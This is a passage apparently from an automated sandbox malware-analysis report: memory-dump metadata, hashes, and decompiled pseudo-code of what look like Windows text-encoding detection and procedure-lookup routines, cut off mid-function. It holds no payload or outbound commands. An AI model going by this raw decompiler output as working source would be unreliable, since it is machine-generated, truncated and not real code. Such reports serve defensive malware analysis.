0x0041c455
0x0041c45b
0x0041c460
0x0041c46c
0x0041c472
0x0041c478
0x0041c47e
0x0041c484
0x0041c48a
0x0041c48a
0x0041c48a
0x0041c490
0x00000000
0x0041c496
0x0041c496
0x0041c49c
0x0041c4a2
0x0041c4ae
0x0041c4b1
0x0041c4b1
0x0041c4b7
0x0041c4b8
0x0041c4be
0x00000000
0x0041c4c4
0x0041c4c4
0x0041c4c9
0x0041c4ca
0x0041c4d2
0x00000000
0x0041c4d8
0x0041c4d8
0x0041c4de
0x0041c4df
0x0041c4e5
0x0041c4e6
0x0041c4ec
0x0041c4ed
0x0041c4ed
0x0041c4ed
0x0041c4f3
0x0041c4fa
0x0041c500
0x0041c506
0x0041c508
0x0041c508
0x0041c4d2
0x0041c4be
0x0041c490
0x0041c2ea
0x0041c2c1
0x0041c2b1
0x0041c181
0x0041c157
0x0041c130
0x0041c093
0x0041c03b
0x0041c022
0x0041bff7
0x0041bfbc
0x0041bf63
0x0041bee0
0x0041beb8
0x0041bea6
0x0041be72
0x0041bdf4
0x0041bda0

Memory Dump Source

Source File: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0397eae5e5d0bcc25b62d2bdee7993146c738feba48df2c3c85274e5e88ed74
Instruction ID: 8886af60b05acecd654af32f44840f171b80ca6d55cfbdbccdb8cfacf0541bf3
Opcode Fuzzy Hash: c0397eae5e5d0bcc25b62d2bdee7993146c738feba48df2c3c85274e5e88ed74
Instruction Fuzzy Hash: E6127C32908395CFE715CF38D98AB813FB1F346724B04424ED9A1975D6D7342569DF88

Uniqueness

Uniqueness Score: -1.00%

Function 03010D20, Relevance: .4, Instructions: 372
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E03010D20(signed short* _a4, signed char _a8, unsigned int _a12) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _t159;
				unsigned int _t160;
				signed int _t162;
				unsigned int _t163;
				signed int _t180;
				signed int _t192;
				signed int _t193;
				unsigned int _t194;
				signed char _t196;
				signed int _t197;
				signed char _t198;
				signed char _t199;
				unsigned int _t200;
				unsigned int _t202;
				unsigned int _t204;
				unsigned int _t205;
				unsigned int _t209;
				signed int _t210;
				signed int _t211;
				unsigned int _t212;
				signed char _t213;
				signed short* _t214;
				intOrPtr _t215;
				signed int _t216;
				signed int _t217;
				unsigned int _t218;
				signed int _t220;
				signed int _t221;
				signed short _t223;
				signed char _t224;
				signed int _t229;
				signed int _t231;
				unsigned int _t233;
				unsigned int _t237;
				signed int _t238;
				unsigned int _t239;
				signed int _t240;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				unsigned int _t258;
				void* _t261;

				_t213 = _a8;
				_t159 = 0;
				_v60 = 0;
				_t237 = _t213 >> 1;
				_t210 = 0;
				_t257 = 0;
				_v56 = 0;
				_v52 = 0;
				_v44 = 0;
				_v48 = 0;
				_v92 = 0;
				_v88 = 0;
				_v76 = 0;
				_v72 = 0;
				_v64 = 0;
				_v68 = 0;
				_v24 = 0;
				_v80 = 0;
				_v84 = 0;
				_v28 = 0;
				_v32 = 0;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v100 = _t237;
				if(_t237 > 0x100) {
					_t254 = 0x100;
					_v36 = 0x100;
					L2:
					_t261 = _t213 - 2;
					if(_t261 == 0) {
						_t214 = _a4;
						_t160 =  *_t214 & 0x0000ffff;
						__eflags = _t160;
						if(_t160 == 0) {
							L108:
							_t159 = 0;
							L8:
							_t238 = 0;
							_v96 = 0;
							if(_t254 == 0) {
								L30:
								_v24 = _t159 - 1;
								goto L31;
							} else {
								goto L11;
								L13:
								_t224 = _t223 >> 8;
								_v40 = _t224;
								_t256 = _t224 & 0x000000ff;
								_t196 = _a4[_t238];
								_v5 = _t196;
								_t197 = _t196 & 0x000000ff;
								if(_t197 == 0xd) {
									__eflags = _t257 - 0xa;
									if(_t257 == 0xa) {
										_v12 = _v12 + 1;
									}
								} else {
									if(_t197 == 0xa) {
										__eflags = _t257 - 0xd;
										if(_t257 == 0xd) {
											_v12 = _v12 + 1;
										}
									}
								}
								_v24 = (0 | _t256 == 0x00000000) + _v24 + (0 | _t197 == 0x00000000);
								if(_t256 > _t257) {
									_t229 = _t256;
								} else {
									_t229 = _t257;
								}
								if(_t257 >= _t256) {
									_t257 = _t256;
								}
								_v28 = _v28 + _t229 - _t257;
								_t231 = _t197;
								if(_t197 <= _t210) {
									_t231 = _t210;
								}
								if(_t210 >= _t197) {
									_t210 = _t197;
								}
								_v32 = _v32 + _t231 - _t210;
								_t238 = _v96 + 1;
								_t210 = _t197;
								_t257 = _t256;
								_v96 = _t238;
								if(_t238 < _v36) {
									_t214 = _a4;
									L11:
									_t223 = _t214[_t238] & 0x0000ffff;
									_t193 = _t223 & 0x0000ffff;
									if(_t193 >= 0x900 || _t193 < 0x21) {
										goto L58;
									} else {
										goto L13;
									}
								}
								_t198 = _v5;
								if(_t198 == 0xd) {
									_t199 = _v40;
									__eflags = _t199 - 0xa;
									if(_t199 != 0xa) {
										L27:
										_t233 = _v12;
										L28:
										if(_t199 != 0) {
											__eflags = _t199 - 0x1a;
											if(_t199 == 0x1a) {
												_v12 = _t233 + 1;
											}
											L31:
											_t162 = _a8;
											if(_t162 > 0x200) {
												_t255 = 0x200;
											} else {
												_t255 = _t162;
											}
											_t215 =  *0x3106d59; // 0x0
											if(_t215 != 0) {
												_t239 = 0;
												__eflags = _t255;
												if(_t255 == 0) {
													goto L34;
												} else {
													goto L119;
												}
												do {
													L119:
													_t192 =  *(_a4 + _t239) & 0x000000ff;
													__eflags =  *((short*)(0x3106920 + _t192 * 2));
													_t163 = _v20;
													if( *((short*)(0x3106920 + _t192 * 2)) != 0) {
														_t163 = _t163 + 1;
														_t239 = _t239 + 1;
														__eflags = _t239;
														_v20 = _t163;
													}
													_t239 = _t239 + 1;
													__eflags = _t239 - _t255;
												} while (_t239 < _t255);
												goto L35;
											} else {
												L34:
												_t163 = 0;
												L35:
												_t240 = _v32;
												_t211 = _v28;
												if(_t240 < 0x7f) {
													__eflags = _t211;
													if(_t211 != 0) {
														L37:
														if(_t240 == 0) {
															_v16 = 0x10;
														}
														L38:
														_t258 = _a12;
														if(_t215 != 0) {
															__eflags = _t163;
															if(_t163 == 0) {
																goto L39;
															}
															__eflags = _t258;
															if(_t258 == 0) {
																goto L39;
															}
															__eflags =  *_t258 & 0x00000400;
															if(( *_t258 & 0x00000400) == 0) {
																goto L39;
															}
															_t218 = _v100;
															__eflags = _t218 - 0x100;
															if(_t218 > 0x100) {
																_t218 = 0x100;
															}
															_t220 = (_t218 >> 1) - 1;
															__eflags = _v20 - 0xaaaaaaab * _t220 >> 0x20 >> 1;
															if(_v20 >= 0xaaaaaaab * _t220 >> 0x20 >> 1) {
																_t221 = _t220 + _t220;
																__eflags = _v20 - 0xaaaaaaab * _t221 >> 0x20 >> 1;
																asm("sbb ecx, ecx");
																_t216 =  ~_t221 + 1;
																__eflags = _t216;
															} else {
																_t216 = 3;
															}
															_v16 = _v16 | 0x00000400;
															_t240 = _v32;
															L40:
															if(_t211 * _t216 < _t240) {
																_v16 = _v16 | 0x00000002;
															}
															_t217 = _v16;
															if(_t240 * _t216 < _t211) {
																_t217 = _t217 | 0x00000020;
															}
															if(_v44 + _v48 + _v52 + _v56 + _v60 != 0) {
																_t217 = _t217 | 0x00000004;
															}
															if(_v64 + _v68 + _v72 + _v76 != 0) {
																_t217 = _t217 | 0x00000040;
															}
															if(_v80 + _v84 + _v88 + _v92 == 0) {
																_t212 = _v12;
																__eflags = _t212;
																if(_t212 == 0) {
																	goto L48;
																}
																__eflags = _t212 - 0xcccccccd * _t255 >> 0x20 >> 5;
																if(_t212 >= 0xcccccccd * _t255 >> 0x20 >> 5) {
																	goto L47;
																}
																goto L48;
															} else {
																L47:
																_t217 = _t217 | 0x00000100;
																L48:
																if((_a8 & 0x00000001) != 0) {
																	_t217 = _t217 | 0x00000200;
																}
																if(_v24 != 0) {
																	_t217 = _t217 | 0x00001000;
																}
																_t180 =  *_a4 & 0x0000ffff;
																if(_t180 != 0xfeff) {
																	__eflags = _t180 - 0xfffe;
																	if(_t180 == 0xfffe) {
																		_t217 = _t217 | 0x00000080;
																	}
																} else {
																	_t217 = _t217 | 0x00000008;
																}
																if(_t258 != 0) {
																	 *_t258 =  *_t258 & _t217;
																	_t217 =  *_t258;
																}
																if((_t217 & 0x00000b08) != 8) {
																	__eflags = _t217 & 0x000000f0;
																	if((_t217 & 0x000000f0) != 0) {
																		L84:
																		return 0;
																	}
																	__eflags = _t217 & 0x00000f00;
																	if((_t217 & 0x00000f00) == 0) {
																		__eflags = _t217 & 0x0000f00f;
																		if((_t217 & 0x0000f00f) == 0) {
																			goto L84;
																		}
																		goto L56;
																	}
																	goto L84;
																} else {
																	L56:
																	return 1;
																}
															}
														}
														L39:
														_t216 = 3;
														goto L40;
													}
													_v16 = 1;
													goto L38;
												}
												if(_t211 == 0) {
													goto L38;
												}
												goto L37;
											}
										} else {
											_t159 = _v24;
											goto L30;
										}
									}
									L104:
									_t233 = _v12 + 1;
									_v12 = _t233;
									goto L28;
								}
								_t199 = _v40;
								if(_t198 != 0xa || _t199 != 0xd) {
									goto L27;
								} else {
									goto L104;
								}
								L58:
								__eflags = _t193 - 0x3001;
								if(_t193 < 0x3001) {
									L60:
									__eflags = _t193 - 0xd00;
									if(__eflags > 0) {
										__eflags = _t193 - 0x3000;
										if(__eflags > 0) {
											_t194 = _t193 - 0xfeff;
											__eflags = _t194;
											if(_t194 != 0) {
												_t200 = _t194 - 0xff;
												__eflags = _t200;
												if(_t200 == 0) {
													_v88 = _v88 + 1;
												} else {
													__eflags = _t200 == 1;
													if(_t200 == 1) {
														_v92 = _v92 + 1;
													}
												}
											}
										} else {
											if(__eflags == 0) {
												_v48 = _v48 + 1;
											} else {
												_t202 = _t193 - 0x2000;
												__eflags = _t202;
												if(_t202 == 0) {
													_v68 = _v68 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v76 = _v76 + 1;
										goto L13;
									}
									__eflags = _t193 - 0x20;
									if(__eflags > 0) {
										_t204 = _t193 - 0x900;
										__eflags = _t204;
										if(_t204 == 0) {
											_v64 = _v64 + 1;
										} else {
											_t205 = _t204 - 0x100;
											__eflags = _t205;
											if(_t205 == 0) {
												_v72 = _v72 + 1;
											} else {
												__eflags = _t205 == 0xd;
												if(_t205 == 0xd) {
													_v84 = _v84 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v44 = _v44 + 1;
										goto L13;
									}
									__eflags = _t193 - 0xd;
									if(_t193 > 0xd) {
										goto L13;
									}
									_t84 = _t193 + 0x3011174; // 0x4040400
									switch( *((intOrPtr*)(( *_t84 & 0x000000ff) * 4 +  &M03011160))) {
										case 0:
											_v80 = _v80 + 1;
											goto L13;
										case 1:
											_v52 = _v52 + 1;
											goto L13;
										case 2:
											_v56 = _v56 + 1;
											goto L13;
										case 3:
											_v60 = _v60 + 1;
											goto L13;
										case 4:
											goto L13;
									}
								}
								__eflags = _t193 - 0xfeff;
								if(_t193 < 0xfeff) {
									goto L13;
								}
								goto L60;
							}
						}
						__eflags = _t160 >> 8;
						if(_t160 >> 8 == 0) {
							L101:
							_t209 = _a12;
							__eflags = _t209;
							if(_t209 != 0) {
								 *_t209 = 5;
							}
							goto L84;
						}
						goto L108;
					}
					if(_t261 <= 0 || _t237 > 0x100) {
						_t214 = _a4;
					} else {
						_t214 = _a4;
						if((_t213 & 0x00000001) == 0 && ( *(_t214 + _t254 * 2 - 2) & 0x0000ff00) == 0) {
							_t254 = _t254 - 1;
							_v36 = _t254;
						}
					}
					goto L8;
				}
				_t254 = _t237;
				_v36 = _t254;
				if(_t254 == 0) {
					goto L101;
				}
				goto L2;
			}

0x03010d2b
0x03010d2e
0x03010d32
0x03010d39
0x03010d3b
0x03010d3d
0x03010d3f
0x03010d46
0x03010d4d
0x03010d54
0x03010d5b
0x03010d62
0x03010d69
0x03010d70
0x03010d77
0x03010d7e
0x03010d85
0x03010d88
0x03010d8b
0x03010d8e
0x03010d91
0x03010d94
0x03010d97
0x03010d9a
0x03010d9d
0x03010da6
0x030110e9
0x030110ee
0x03010db9
0x03010db9
0x03010dbc
0x0306e9c7
0x0306e9ca
0x0306e9cd
0x0306e9d0
0x0306e9dd
0x0306e9dd
0x03010dec
0x03010dec
0x03010dee
0x03010df3
0x03010ebf
0x03010ec0
0x00000000
0x03010df9
0x03010df9
0x03010e1e
0x03010e21
0x03010e24
0x03010e27
0x03010e2a
0x03010e2d
0x03010e30
0x03010e36
0x03011040
0x03011043
0x03011049
0x03011049
0x03010e3c
0x03010e3f
0x03011007
0x0301100a
0x03011010
0x03011010
0x0301100a
0x03010e3f
0x03010e58
0x03010e5d
0x03011000
0x03010e63
0x03010e63
0x03010e63
0x03010e67
0x03010e69
0x03010e69
0x03010e6d
0x03010e70
0x03010e74
0x03010e76
0x03010e76
0x03010e7a
0x03010e7c
0x03010e7c
0x03010e83
0x03010e86
0x03010e87
0x03010e89
0x03010e8b
0x03010e91
0x03010e00
0x03010e03
0x03010e03
0x03010e07
0x03010e0f
0x00000000
0x00000000
0x00000000
0x00000000
0x03010e0f
0x03010e97
0x03010e9c
0x0301113e
0x03011141
0x03011143
0x03010eb1
0x03010eb1
0x03010eb4
0x03010eb6
0x03011110
0x03011112
0x0306ea25
0x0306ea25
0x03010ec3
0x03010ec3
0x03010ecb
0x030110fe
0x03010ed1
0x03010ed1
0x03010ed1
0x03010ed3
0x03010edb
0x0306ea2d
0x0306ea2f
0x0306ea31
0x00000000
0x00000000
0x00000000
0x00000000
0x0306ea37
0x0306ea37
0x0306ea3a
0x0306ea3e
0x0306ea47
0x0306ea4a
0x0306ea4c
0x0306ea4d
0x0306ea4d
0x0306ea4e
0x0306ea4e
0x0306ea51
0x0306ea52
0x0306ea52
0x00000000
0x03010ee1
0x03010ee1
0x03010ee1
0x03010ee3
0x03010ee3
0x03010ee6
0x03010eec
0x0306ea5b
0x0306ea5d
0x03010ef6
0x03010ef8
0x0306ea6f
0x0306ea6f
0x03010efe
0x03010efe
0x03010f03
0x0306ea7b
0x0306ea7d
0x00000000
0x00000000
0x0306ea83
0x0306ea85
0x00000000
0x00000000
0x0306ea8b
0x0306ea91
0x00000000
0x00000000
0x0306ea97
0x0306ea9a
0x0306eaa0
0x0306eaa2
0x0306eaa2
0x0306eaae
0x0306eab3
0x0306eab6
0x0306eabf
0x0306eaca
0x0306eacd
0x0306ead1
0x0306ead1
0x0306eab8
0x0306eab8
0x0306eab8
0x0306ead2
0x0306ead9
0x03010f0e
0x03010f15
0x03010f17
0x03010f17
0x03010f1e
0x03010f23
0x0306eae1
0x0306eae1
0x03010f38
0x03010f3a
0x03010f3a
0x03010f49
0x03011108
0x03011108
0x03010f5b
0x030110c7
0x030110ca
0x030110cc
0x00000000
0x00000000
0x030110dc
0x030110de
0x00000000
0x00000000
0x00000000
0x03010f61
0x03010f61
0x03010f61
0x03010f67
0x03010f6b
0x0301111d
0x0301111d
0x03010f75
0x03010f77
0x03010f77
0x03010f85
0x03010f8b
0x030110b9
0x030110bc
0x0306eae9
0x0306eae9
0x03010f91
0x03010f91
0x03010f91
0x03010f96
0x03010f98
0x03010f9a
0x03010f9a
0x03010fa6
0x0301107c
0x0301107f
0x0301108d
0x00000000
0x0301108d
0x03011081
0x03011087
0x0306eaf4
0x0306eafa
0x00000000
0x00000000
0x00000000
0x0306eb00
0x00000000
0x03010fac
0x03010fac
0x00000000
0x03010fac
0x03010fa6
0x03010f5b
0x03010f09
0x03010f09
0x00000000
0x03010f09
0x0306ea63
0x00000000
0x0306ea63
0x03010ef4
0x00000000
0x00000000
0x00000000
0x03010ef4
0x03010ebc
0x03010ebc
0x00000000
0x03010ebc
0x03010eb6
0x03011149
0x0301114c
0x0301114d
0x00000000
0x0301114d
0x03010ea4
0x03010ea7
0x00000000
0x00000000
0x00000000
0x00000000
0x03010fb7
0x03010fb7
0x03010fbc
0x03010fc9
0x03010fc9
0x03010fce
0x03011020
0x03011025
0x03011094
0x03011094
0x03011099
0x0306ea04
0x0306ea04
0x0306ea09
0x0306ea1c
0x0306ea0b
0x0306ea0b
0x0306ea0e
0x0306ea14
0x0306ea14
0x0306ea0e
0x0306ea09
0x03011027
0x03011027
0x03011155
0x0301102d
0x0301102d
0x0301102d
0x03011032
0x0306e9fc
0x0306e9fc
0x03011032
0x03011027
0x00000000
0x03011025
0x03010fd0
0x0306e9f4
0x00000000
0x0306e9f4
0x03010fd6
0x03010fd9
0x03011059
0x03011059
0x0301105e
0x0306e9ec
0x03011064
0x03011064
0x03011064
0x03011069
0x030110ac
0x0301106b
0x0301106b
0x0301106e
0x03011074
0x03011074
0x0301106e
0x03011069
0x00000000
0x0301105e
0x03010fdb
0x030110a4
0x00000000
0x030110a4
0x03010fe1
0x03010fe4
0x00000000
0x00000000
0x03010fea
0x03010ff1
0x00000000
0x03010ff8
0x00000000
0x00000000
0x0306e9e4
0x00000000
0x00000000
0x03011018
0x00000000
0x00000000
0x03011051
0x00000000
0x00000000
0x00000000
0x00000000
0x03010ff1
0x03010fbe
0x03010fc3
0x00000000
0x00000000
0x00000000
0x03010fc3
0x03010df3
0x0306e9d5
0x0306e9d7
0x03011128
0x03011128
0x0301112b
0x0301112d
0x03011133
0x03011133
0x00000000
0x0301112d
0x00000000
0x0306e9d7
0x03010dc2
0x030110f6
0x03010dd4
0x03010dd7
0x03010dda
0x03010de8
0x03010de9
0x03010de9
0x03010dda
0x00000000
0x03010dc2
0x03010dac
0x03010dae
0x03010db3
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b9908d9a28132dae598035b5773aa19e7835d7f7699848bcadab8103d7cb724
Instruction ID: 90c7ddf2d298bea81f7e84a580ee701464f6ecac546091f515be5c09005f7141
Opcode Fuzzy Hash: 6b9908d9a28132dae598035b5773aa19e7835d7f7699848bcadab8103d7cb724
Instruction Fuzzy Hash: A4D1DF31E062198BDFACCE9AC5913BDFBF5FB44300F188429D582AB689D77499E1CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0302D5E0, Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E0302D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x310d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E03026600(0x31052d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x3107b9c; // 0x0
							_t281 = L03034620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0305F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x3107b90; // 0x77df0000
								if(_t384 == 0) {
									_t353 =  *0x3107b8c; // 0x1412aa8
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E03032280(_t200, 0x31084d8);
									_t277 =  *0x31085f4; // 0x1415de0
									_t351 =  *0x31085f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x1415d78
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0302FFB0(_t287, _t353, 0x31084d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0306CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E03026600(0x31052d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E03027926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x310b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0309E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x3108472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x310b1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x310b218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E03032280(_t250, 0x31084d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L03053898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0302FFB0(_t293, _t353, 0x31084d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E030537F5(_t353, 0);
																}
																E03050413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E03049B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E030402D6(_t174);
																}
																L030377F0( *0x3107b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0304C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0302EC7F(_t353);
										L030419B8(_t287, 0, _t353, 0);
										_t200 = E0301F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x310b2f8 |  *0x310b2fc) == 0 || ( *0x310b2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0305B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x310b2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E030C6B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E030C6AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E0302E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
